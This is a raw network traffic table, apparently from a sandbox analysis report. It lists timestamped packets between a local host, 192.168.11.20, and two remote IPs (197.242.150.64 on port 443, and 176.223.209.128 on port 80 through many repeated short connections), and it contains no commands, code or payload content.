                                              Nov 25, 2021 10:47:52.688813925 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.854479074 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.854779005 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.857505083 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.857702971 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.857880116 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858072042 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858251095 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858294964 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858325005 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858409882 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858500004 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858530998 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858720064 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858789921 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858895063 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.859002113 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.859046936 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.859054089 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.859409094 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:54.169415951 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.202750921 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.203001022 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.204528093 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.237848043 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.238023996 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.271303892 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.380963087 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.381019115 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.381377935 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.381423950 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.414658070 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:00.959841013 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.993249893 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:00.993474007 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.994992018 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.995047092 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.995079994 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.028297901 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.028568983 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.028614998 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.080023050 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.080080032 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.080358982 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.080440998 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.113857031 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.683996916 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.717415094 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.717715979 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.719255924 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.752535105 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.752748013 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.786055088 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.885267019 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.885318995 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.885462046 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.885510921 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.918936014 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:02.513181925 CET4982380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:02.547420979 CET8049823176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:02.547630072 CET4982380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:02.549129009 CET4982380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:02.583185911 CET8049823176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:02.583339930 CET4982380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:02.617285013 CET8049823176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:02.669756889 CET8049823176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:02.669826984 CET8049823176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:02.670042038 CET4982380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:02.670146942 CET4982380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:02.704274893 CET8049823176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.234540939 CET4982480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.267596960 CET8049824176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.267874956 CET4982480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.269522905 CET4982480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.302570105 CET8049824176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.302797079 CET4982480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.335903883 CET8049824176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.352428913 CET8049824176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.352452040 CET8049824176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.352720022 CET4982480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.352744102 CET4982480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.385893106 CET8049824176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.885097027 CET4982580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.919184923 CET8049825176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.919516087 CET4982580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.921017885 CET4982580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.954993963 CET8049825176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:03.955220938 CET4982580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:03.989337921 CET8049825176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.006619930 CET8049825176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.006696939 CET8049825176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.006978989 CET4982580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.007061005 CET4982580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.041196108 CET8049825176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.604367018 CET4982680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.638448000 CET8049826176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.638618946 CET4982680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.640363932 CET4982680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.674442053 CET8049826176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.674635887 CET4982680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.708628893 CET8049826176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.724145889 CET8049826176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.724195004 CET8049826176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:04.724360943 CET4982680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.724411011 CET4982680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:04.758649111 CET8049826176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:05.389092922 CET4982880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:05.422564030 CET8049828176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:05.422761917 CET4982880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:05.424331903 CET4982880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:05.457716942 CET8049828176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:05.457895994 CET4982880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:05.491239071 CET8049828176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:05.509834051 CET8049828176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:05.509884119 CET8049828176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:05.510061026 CET4982880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:05.510112047 CET4982880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:05.543656111 CET8049828176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.194473982 CET4984480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.228276968 CET8049844176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.228486061 CET4984480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.230046034 CET4984480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.263746977 CET8049844176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.263920069 CET4984480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.297679901 CET8049844176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.314524889 CET8049844176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.314534903 CET8049844176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.314702988 CET4984480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.314709902 CET4984480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.348362923 CET8049844176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.956222057 CET4984580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.990365982 CET8049845176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:06.990576029 CET4984580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:06.992096901 CET4984580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.026030064 CET8049845176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.026221991 CET4984580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.060340881 CET8049845176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.107255936 CET8049845176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.107326984 CET8049845176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.107573986 CET4984580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.107644081 CET4984580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.141989946 CET8049845176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.698524952 CET4984680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.732588053 CET8049846176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.732871056 CET4984680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.734355927 CET4984680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.768362999 CET8049846176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.768578053 CET4984680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.802611113 CET8049846176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.818254948 CET8049846176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.818311930 CET8049846176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:07.818454981 CET4984680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.818506002 CET4984680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:07.852659941 CET8049846176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:08.383425951 CET4984780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:08.416685104 CET8049847176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:08.416848898 CET4984780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:08.418318987 CET4984780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:08.451663017 CET8049847176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:08.451869965 CET4984780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:08.485127926 CET8049847176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:08.506304979 CET8049847176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:08.506324053 CET8049847176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:08.506489992 CET4984780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:08.506508112 CET4984780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:08.539669037 CET8049847176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.072515011 CET4984880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.105695963 CET8049848176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.105905056 CET4984880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.107460976 CET4984880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.140614986 CET8049848176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.141113997 CET4984880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.174264908 CET8049848176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.192800045 CET8049848176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.192872047 CET8049848176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.193057060 CET4984880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.193115950 CET4984880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.226366997 CET8049848176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.821670055 CET4984980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.855720997 CET8049849176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.855920076 CET4984980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.857429981 CET4984980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.891432047 CET8049849176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.891676903 CET4984980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.925781965 CET8049849176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.977329016 CET8049849176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.977407932 CET8049849176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:09.977646112 CET4984980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:09.977709055 CET4984980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.012202024 CET8049849176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:10.656148911 CET4985080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.690265894 CET8049850176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:10.690566063 CET4985080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.692074060 CET4985080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.726279974 CET8049850176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:10.726584911 CET4985080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.760899067 CET8049850176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:10.784281969 CET8049850176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:10.784375906 CET8049850176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:10.784543037 CET4985080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.784610033 CET4985080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:10.818795919 CET8049850176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:11.434041023 CET4985180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:11.467900991 CET8049851176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:11.468086004 CET4985180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:11.469665051 CET4985180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:11.503513098 CET8049851176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:11.503652096 CET4985180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:11.537632942 CET8049851176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:11.553739071 CET8049851176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:11.553813934 CET8049851176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:11.553977013 CET4985180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:11.554018021 CET4985180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:11.588042021 CET8049851176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.101917982 CET4985280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.135941982 CET8049852176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.136234999 CET4985280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.137739897 CET4985280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.171830893 CET8049852176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.172027111 CET4985280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.206109047 CET8049852176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.222152948 CET8049852176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.222223043 CET8049852176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.222529888 CET4985280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.222590923 CET4985280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.256516933 CET8049852176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.840815067 CET4985380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.874262094 CET8049853176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.874486923 CET4985380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.876249075 CET4985380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.909596920 CET8049853176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.909812927 CET4985380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.943155050 CET8049853176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.958539963 CET8049853176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.958594084 CET8049853176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:12.958826065 CET4985380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.958878994 CET4985380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:12.992486954 CET8049853176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:13.610528946 CET4985480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:13.644558907 CET8049854176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:13.644812107 CET4985480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:13.646368980 CET4985480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:13.680464029 CET8049854176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:13.680684090 CET4985480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:13.714741945 CET8049854176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:13.730961084 CET8049854176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:13.731017113 CET8049854176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:13.731169939 CET4985480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:13.731273890 CET4985480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:13.765327930 CET8049854176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:14.371279955 CET4985580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:14.405198097 CET8049855176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:14.405348063 CET4985580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:14.406984091 CET4985580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:14.440969944 CET8049855176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:14.441381931 CET4985580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:14.475522995 CET8049855176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:14.524874926 CET8049855176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:14.524961948 CET8049855176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:14.525144100 CET4985580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:14.525204897 CET4985580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:14.559212923 CET8049855176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.033602953 CET4985680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.067008018 CET8049856176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.067228079 CET4985680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.068809032 CET4985680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.102159977 CET8049856176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.102410078 CET4985680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.136013985 CET8049856176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.152544022 CET8049856176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.152600050 CET8049856176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.152748108 CET4985680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.152802944 CET4985680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.186460972 CET8049856176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.704840899 CET4985780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.738883972 CET8049857176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.739145041 CET4985780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.740662098 CET4985780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.774796009 CET8049857176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.774986029 CET4985780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.809237957 CET8049857176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.825707912 CET8049857176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.825772047 CET8049857176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:15.826091051 CET4985780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.826193094 CET4985780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:15.860560894 CET8049857176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:16.401611090 CET4985880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:16.435703039 CET8049858176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:16.435857058 CET4985880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:16.437510014 CET4985880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:16.471529961 CET8049858176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:16.471724033 CET4985880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:16.505949020 CET8049858176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:16.523509979 CET8049858176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:16.523575068 CET8049858176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:16.523718119 CET4985880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:16.523780107 CET4985880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:16.558142900 CET8049858176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.064765930 CET4985980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.098838091 CET8049859176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.099139929 CET4985980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.100651979 CET4985980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.134748936 CET8049859176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.135035992 CET4985980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.169091940 CET8049859176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.190354109 CET8049859176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.190365076 CET8049859176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.190952063 CET4985980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.190964937 CET4985980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.224745035 CET8049859176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.699054956 CET4986080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.732939005 CET8049860176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.733088017 CET4986080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.734632015 CET4986080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.768544912 CET8049860176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.768721104 CET4986080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.802474976 CET8049860176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.821785927 CET8049860176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.821813107 CET8049860176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:17.822055101 CET4986080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.822072029 CET4986080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:17.856005907 CET8049860176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:18.382203102 CET4986180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:18.415529013 CET8049861176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:18.415762901 CET4986180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:18.417273998 CET4986180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:18.450568914 CET8049861176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:18.450839996 CET4986180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:18.484225035 CET8049861176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:18.506346941 CET8049861176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:18.506402969 CET8049861176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:18.506685972 CET4986180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:18.506771088 CET4986180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:18.540213108 CET8049861176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.036137104 CET4986280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.070043087 CET8049862176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.070312977 CET4986280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.071831942 CET4986280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.105667114 CET8049862176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.105864048 CET4986280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.139744997 CET8049862176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.155915022 CET8049862176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.155936956 CET8049862176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.156100988 CET4986280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.156121016 CET4986280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.189954042 CET8049862176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.684170008 CET4986380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.717525959 CET8049863176.223.209.128192.168.11.20
